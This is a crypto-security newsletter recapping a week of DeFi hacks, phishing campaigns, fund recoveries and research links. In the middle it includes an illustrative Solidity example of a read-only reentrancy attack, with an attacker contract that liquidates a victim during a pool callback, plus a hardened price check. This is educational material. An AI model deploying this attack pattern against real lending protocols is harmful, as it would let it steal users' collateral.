BlockThreat - Week 6, 2023
dForce | CoW Swap | SushiSwap | SperaxUSD | NameCheap | Bitzlato
More than $5.4M was stolen from various DeFi projects this week. dForce Network was hit particularly hard by a relatively new class of bug, read-only reentrancy. On the bright side, web3 sleuths got a lot better at identifying attackers and pressuring these “whitehats” to return stolen assets: both dForce and SperaxUSD (from last week) got their stolen assets back. Attackers also appear to have written an auto-pwner for a few common vulnerabilities, which is currently wreaking havoc on BNB Chain.
In other news, one of Bitzlato exchange’s founders was detained in Russia and quickly released. The Wormhole attacker is going full degen and leveraging up with liquid-staked ETH.
Webaverse was hit with a mysterious social engineering attack in which attackers posing as investors took a picture of the team’s Trust Wallet balances; the private keys were compromised and $4M in USDC was stolen shortly after, though how the keys leaked is still unclear.
Stay safe out there and avoid meeting unknown investors in hotel lobbies. Let’s dive into the news, but first some wild stats on last year’s exploits from our friends at Chainalysis that will hopefully inspire you to join the good fight!
2022: The Biggest Year EVER(!) for Crypto Hacking
Last year, $3.8 billion was stolen through crypto hacking, primarily from DeFi protocols and by North Korea-linked attackers. Hacking activity ebbed and flowed throughout the year, with huge spikes in March and October; the latter became the biggest single month ever for cryptocurrency hacking, with $775.7 million stolen in 32 separate attacks.
What platforms were most affected? What role did North Korea-linked hackers play?
Bitzlato Co-Founder Released After Arrest in Moscow, Pledges Relaunch of Seized Exchange.
SperaxUSD attackers returned stolen funds after they were identified.
dForce attacker voluntarily returned all of the stolen assets after their Singapore-based IP address was shared with authorities.
Wormhole Bridge Exploiter Supplies $46M to Crypto Lending Platform Maker, Buys Wrapped Ether.
Reports of attackers auto-hacking projects with weak handling of deflationary tokens and price oracles on the BSC and ETH chains.
NameCheap's email hacked to send Metamask, DHL phishing emails.
Crypto project Webaverse hacked for $4M in a hotel lobby. This was not the first time the gang hit crypto entrepreneurs.
Analysis of Monkey Drainer NFT Phishing Group by SlowMist.
Crypto phishing campaign exploits Twitter’s content preview flaw by SlowMist.
On February 7, 2023 LianGo lost $1.62M due to private key theft.
On February 7, 2023 CoW Swap Protocol was relieved of $166K after a combination of a malicious contract approval and missing function access controls allowed attackers to drain all approved tokens.
On February 9, 2023 SushiSwap BentoBoxV1 was targeted in a price oracle manipulation attack which resulted in a $26K loss.
On February 9, 2023 dForce Network lost $3.65M after it was exploited via a read-only reentrancy vulnerability. Stolen assets were returned after the attacker was identified.
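Read-only reentrancy, the bug class behind the dForce incident above, in an added Solidity example that is not code from dForce, Curve or this newsletter. It models a simplified ETH pool whose removeLiquidity updates balances and sends ETH before burning LP supply (the ordering that makes Curve-style ETH pools exploitable), a lender that values LP collateral with the pool's virtual price, and an attacker that liquidates a victim from inside the ETH callback, while the pool's lock is held and the view function still answers. Contract and function names (EthPool, LpLender, getVirtualPriceChecked, ReadOnlyReentrancyAttacker) and the figures in the usage note are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative ETH pool issuing LP shares. removeLiquidity mirrors the ordering of
// Curve's ETH pools: the balance is updated and ETH is sent BEFORE the LP supply is
// burned, so a view called from the ETH callback divides a reduced balance by a
// not-yet-reduced supply.
contract EthPool {
    uint256 public poolBalance;   // ETH credited to LPs
    uint256 public totalSupply;   // LP shares outstanding
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    bool private locked;          // reentrancy lock, not visible to callers

    modifier nonReentrant() { require(!locked, "locked"); locked = true; _; locked = false; }

    function addLiquidity() external payable nonReentrant returns (uint256 shares) {
        shares = totalSupply == 0 ? msg.value : msg.value * totalSupply / poolBalance;
        poolBalance += msg.value;
        totalSupply += shares;
        balanceOf[msg.sender] += shares;
    }

    function removeLiquidity(uint256 shares) external nonReentrant {
        require(balanceOf[msg.sender] >= shares, "insufficient shares");
        uint256 ethOut = poolBalance * shares / totalSupply;
        poolBalance -= ethOut;                                // balance updated...
        (bool ok, ) = msg.sender.call{value: ethOut}("");     // ...callback fires here...
        require(ok, "send failed");
        balanceOf[msg.sender] -= shares;
        totalSupply -= shares;                                // ...supply burned only afterwards
    }

    // Vulnerable oracle: a plain view that answers even while `locked` is set.
    function getVirtualPrice() external view returns (uint256) {
        return poolBalance * 1e18 / totalSupply;
    }

    // Hardened oracle: refuse to report a price while a state-changing call is in flight.
    function getVirtualPriceChecked() external view returns (uint256) {
        require(!locked, "pool mid-operation");
        return poolBalance * 1e18 / totalSupply;
    }

    function approve(address spender, uint256 v) external returns (bool) {
        allowance[msg.sender][spender] = v; return true;
    }
    function transferFrom(address from, address to, uint256 v) external returns (bool) {
        allowance[from][msg.sender] -= v; balanceOf[from] -= v; balanceOf[to] += v; return true;
    }
}

// Lending market that accepts EthPool LP shares as collateral, valued at the pool's
// virtual price. `useCheckedOracle` selects the vulnerable or the hardened read.
contract LpLender {
    EthPool public immutable pool;
    bool public immutable useCheckedOracle;
    uint256 public constant LTV_BPS = 8000;
    mapping(address => uint256) public collateralShares;
    mapping(address => uint256) public debtWei;

    constructor(EthPool _pool, bool _useCheckedOracle) payable {   // funded with lendable ETH
        pool = _pool; useCheckedOracle = _useCheckedOracle;
    }

    function lpPrice() public view returns (uint256) {
        return useCheckedOracle ? pool.getVirtualPriceChecked() : pool.getVirtualPrice();
    }

    function isHealthy(address user) public view returns (bool) {
        uint256 valueWei = collateralShares[user] * lpPrice() / 1e18;
        return debtWei[user] * 10_000 <= valueWei * LTV_BPS;
    }

    function depositAndBorrow(uint256 shares, uint256 borrowWei) external {
        require(pool.transferFrom(msg.sender, address(this), shares), "pull failed");
        collateralShares[msg.sender] += shares;
        debtWei[msg.sender] += borrowWei;
        require(isHealthy(msg.sender), "undercollateralised");
        (bool ok, ) = msg.sender.call{value: borrowWei}("");
        require(ok, "lend failed");
    }

    // Liquidator repays the whole debt and seizes all collateral (no close factor, for brevity).
    function liquidate(address user) external payable {
        require(!isHealthy(user), "position healthy");
        require(msg.value == debtWei[user], "repay exact debt");
        uint256 seized = collateralShares[user];
        collateralShares[user] = 0; debtWei[user] = 0;
        collateralShares[msg.sender] += seized;
    }
}

// Attacker: deposit a large amount, withdraw it, and use the ETH callback window
// (pool locked, price depressed) to liquidate a victim on the lender.
contract ReadOnlyReentrancyAttacker {
    EthPool immutable pool; LpLender immutable lender; address immutable victim;
    bool public liquidatedVictim;

    constructor(EthPool _pool, LpLender _lender, address _victim) {
        pool = _pool; lender = _lender; victim = _victim;
    }

    function attack() external payable {
        uint256 shares = pool.addLiquidity{value: msg.value}();
        pool.removeLiquidity(shares);   // re-enters receive() below mid-call
    }

    receive() external payable {
        // Plain view: the victim looks undercollateralised. Checked view: isHealthy()
        // reverts, the catch branch runs, and the victim is left untouched.
        try lender.isHealthy(victim) returns (bool healthy) {
            if (!healthy) {
                lender.liquidate{value: lender.debtWei(victim)}(victim);  // paid from the ETH just received
                liquidatedVictim = true;
            }
        } catch {}
    }
}
```

Walking through assumed numbers: the victim adds 10 ETH (10 shares, virtual price 1e18), approves the lender and borrows 7.5 ETH against those 10 shares (80% LTV allows 8). The attacker calls attack() with 40 ETH, receives 40 shares, and immediately removes them. Inside the callback poolBalance is 10 ETH while totalSupply is still 50, so getVirtualPrice() reports 0.2e18, the victim's collateral is valued at 2 ETH against 7.5 ETH of debt, and the attacker repays 7.5 ETH of the 40 just received and seizes 10 shares that are worth 10 ETH again once removeLiquidity finishes. With useCheckedOracle set, the same sequence leaves liquidatedVictim false because the price read reverts while the lock is held. Real pools rarely expose their lock, so the practical form of the check is for the consumer to call any nonReentrant function on the pool before reading the price and treat a revert as "do not price now".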
Infinite minting vulnerability discovered in BNB Chain and reported through a responsible disclosure process by Felix Wilhelm, Jump Crypto.
Critical vulnerability discovered in the OneKey hardware wallet which allows an attacker with physical access to recover the stored mnemonic seed phrase.
DookeyDash exploitation and botting.
Fuzzing Solidity/Ethereum Smart Contract using Foundry/Forge by Patrick Ventuzelo.
$1mln - Generating ETH from thin air - Aurora rainbow bridge withdrawal logic bug.
0xleastwood: Spearbit Lead Security Researcher talks Web3 Security and Smart Contract Auditing by Andy Li.
DeGatchi on Reverse Engineering and MEV - Devs Do Something 26.
Analyzing transactions on Sinbad BTC tumbler used by North Korean attackers by ErgoBTC.
I See Dead Code - What if I told you that over one-third of recently-deployed Ethereum smart contracts consist mostly of unusable junk? by Sifis Lagouvardos (Dedaub)
OnChain Transaction Debugging - Lesson 6: Write Your Own PoC (Reentrancy) by DeFiHackLabs.
Breaking Fluidity for glory and $50K by Trust in Distrust.
First Deposit Bug in CompoundV2 by Akshay Srivastav.
How to hack into NFT marketplace by Alex Horlan, Hacken Proof.
Balancer Logic Error Bugfix Review by Immunefi.
How to Submit Bug Reports That Get Paid by Immunefi.
Lesson 1: Smart Contract Audit Methodology & Tips by SunWeb3Sec.
Modular MEV; Part 1—The Introduction by Maven11.
A beginner's intro to coding zero-knowledge proofs by Santiago Palladino.
Symbolic testing with Halmos: Leveraging existing tests for formal verification by Daejun Park, a16z.
Solidity Coverage in VS Code with Foundry by Devan Non.
Querying internal smart contract parameters with Foundry by Apoorv Lathey.
ABI Tools - Transaction calldata decoder by samczsun.
Bytegraph - Smart-Contract Analysis Tool.
Erigon-DB - Fully typed access to the Erigon database in rust.
vEVM - on-chain gasless arbitrary bytecode execution engine.
Enjoy reading BlockThreat? Consider sponsoring the next edition or becoming a paid subscriber to unlock the premium section with indicators, special reports, and searchable newsletter archives.